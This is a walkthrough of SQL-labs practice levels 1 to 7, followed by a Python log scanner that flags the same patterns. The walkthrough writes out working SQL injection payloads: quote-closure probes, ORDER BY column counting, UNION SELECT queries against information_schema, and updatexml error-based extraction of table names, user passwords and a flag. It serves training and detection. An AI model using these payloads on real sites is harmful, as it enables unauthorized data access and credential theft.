SQL-labs
Less1
Try ?id=1
?id=1' errors
?id=1'--+ works normally (the + URL-decodes to a space)
This shows the comment sequence can be used to cut off the rest of the query
Determine the number of columns
?id=1' order by 3--+ works normally
Union injection
?id=-1' union select 1,2,3--+
Dump the database names
?id=1' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
Dump the table names
?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables--+
?id=1' and 1=2 union select 1,2,group_concat(flag) from ctftraining.flag--+
Less2
?id=1" errors, so the parameter is not wrapped in quotes; it is a numeric parameter
?id=1 --+ works normally
Determine the number of columns
?id=1 order by 3--+ works normally
Union injection
Dump the database names
?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
Dump the table names
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables--+
?id=1 and 1=2 union select 1,2,group_concat(flag) from ctftraining.flag--+
Less3
?id=1" works normally, so the parameter may be wrapped in quotes
?id=;/';[]' forces a database syntax error; extract the key characters from the error message to infer how the value is closed
Possible SQL statements
SELECT * FROM table WHERE id=('1') LIMIT 0,1
SELECT * FROM table WHERE id=(';/';[]'') LIMIT 0,1
?id=1') order by 3--+ works normally
Union injection
The remaining steps are the same as Less1 and Less2
Less4
?id=1" errors
Infer that the original closing is ")
?id=1") order by 3--+ works normally
?id=1") and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
?id=1") and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+
?id=1") and 1=2 union select 1,2,group_concat(flag) from ctftraining.flag--+
Less5
?id=1'
Closing: '
?id=1' ORDER BY 3--+
Errors once increased to 4
So there are 3 columns
Error-based injection
?id=1' and updatexml(1,substring(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1,99),3) --+
Echoes XPATH syntax error: '~ctftraining,information_schema,'
?id=1' union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="ctftraining") ,0x7e),3)--+
Echoes XPATH syntax error: 'flag,news,users'
?id=1' union select updatexml(1,concat(0x7e, left((select(group_concat(flag)) from ctftraining.flag) ,25),0x7e),3)--+
?id=1' union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from ctftraining.flag) ,25),0x7e),3)--+
Less6
?id=1" errors
?id=1" --+ works normally
Error-based injection
Dump the database name
?id=1" and updatexml(1,concat(0x7e,database()),3)--+
Echoes XPATH syntax error: '~security'
Dump the table names
?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")),3)--+
Echoes XPATH syntax error: '~emails,referers,uagents,users'
Dump the column names
?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")),3)--+
Echoes XPATH syntax error: '~id,username,password'
?id=1" and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 4,1)),3)--+
Less7
?id=1'
Shows You have an error in your SQL syntax
This indicates the original query probably wraps the string in single quotes
?id=1"
Shows You are in.... Use outfile......
?id=1') and 1=1--+ errors, so the closing ') is not quite right
?id=1')) and 1=1--+ works normally, so the closing ')) is correct
Determine the number of columns
?id=1')) order by 3--+
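As an added defender-side example (not part of the original notes), a small Python scanner that flags the request patterns walked through above in constructed web-server log lines: closure probes ending in a comment, ORDER BY column counting, AND 1=1 / 1=2 boolean probes, UNION SELECT against information_schema, and updatexml() error extraction. The log format, sample lines and indicator names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Indicators matching the probing sequence used in the labs above.
# Regexes run on the URL-decoded query string, so "--+" becomes "-- ".
INDICATORS = {
    "comment_tail": re.compile(r"--\s*$|#\s*$"),          # '--+ / " --+ closure probes
    "order_by_enum": re.compile(r"\border\s+by\s+\d+", re.I),   # column counting
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),  # and 1=1 / and 1=2
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I),
    "error_based": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
}


def classify_request(raw_query: str) -> set:
    """Return the set of indicator names matched by one raw query string."""
    decoded = unquote_plus(raw_query)  # %27 -> ', + -> space, as the server sees it
    return {name for name, rx in INDICATORS.items() if rx.search(decoded)}


# Constructed sample log lines (assumed "METHOD PATH PROTO" format, not real traffic).
SAMPLE_LOG = [
    "GET /Less-1/?id=1 HTTP/1.1",
    "GET /Less-1/?id=1'--+ HTTP/1.1",
    "GET /Less-1/?id=1'%20order%20by%203--+ HTTP/1.1",
    "GET /Less-1/?id=-1'%20union%20select%201,2,group_concat(schema_name)"
    "%20from%20information_schema.schemata--+ HTTP/1.1",
    "GET /Less-5/?id=1'%20and%20updatexml(1,concat(0x7e,database()),3)--+ HTTP/1.1",
    "GET /Less-7/?id=1'))%20and%201=1--+ HTTP/1.1",
]


def scan_log(lines):
    """Return [(line, sorted indicators)] for lines whose query string matches any indicator."""
    hits = []
    for line in lines:
        parts = line.split(" ")
        path = parts[1] if len(parts) > 1 else line
        query = path.partition("?")[2]
        found = classify_request(query)
        if found:
            hits.append((line, sorted(found)))
    return hits


if __name__ == "__main__":
    for line, found in scan_log(SAMPLE_LOG):
        print(", ".join(found), "<-", line)
```

A single hit on comment_tail alone is a weak signal; the escalation from closure probe to order_by_enum to union_select or error_based from one client is what an alert should key on.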